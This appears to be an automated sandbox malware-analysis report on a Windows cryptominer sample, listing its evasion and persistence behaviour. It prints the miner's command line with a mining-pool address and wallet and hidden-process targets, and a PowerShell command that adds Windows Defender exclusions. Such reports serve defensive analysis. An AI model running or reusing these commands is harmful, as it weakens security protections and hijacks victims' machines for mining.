            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=48SNGK2YLREZCJVUYXKT5QUBH4ICDG8SBWK9PX624HM1E8Z2RIW8EKXCH2TT35OD6W2PHVVQ3RBXCCTQKZGDXMD5TJJQUEQ.KARIG--PASS=--CPU-MAX-THREADS-HINT=50--CINIT-WINRING=HNKCGWELKFZN.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=1--CINIT-IDLE-CPU=100--CINIT-ID=LXSQSYGUEJXGUMUJR
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEVBE;.JS;.JS
            Source: explorer.exe, 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEOCESSORA,
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEGF
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000003.1831894727.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
            Source: explorer.exe, 00000025.00000003.1831894727.0000000000F71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXELXSQSYGUEJXGUMUJ
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5073Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4741Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7620
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2102
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeDropped PE file which has not been started: C:\Windows\Temp\hnkcgwelkfzn.sysJump to dropped file
            Source: C:\Users\user\Desktop\aA45th2ixY.exeAPI coverage: 3.2 %
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeAPI coverage: 3.2 %
            Source: C:\Windows\System32\conhost.exeAPI coverage: 1.1 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep count: 5073 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 4741 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep count: 7620 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148Thread sleep count: 2102 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\explorer.exe TID: 648Thread sleep count: 135 > 30Jump to behavior
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\aA45th2ixY.exeCode function: 0_2_00007FF6E17D1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF6E17D1160
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeCode function: 23_2_00007FF7B9E81160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,23_2_00007FF7B9E81160
            Source: C:\Windows\System32\conhost.exeCode function: 35_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,35_2_0000000140001160

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 51.15.58.224 10343Jump to behavior
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
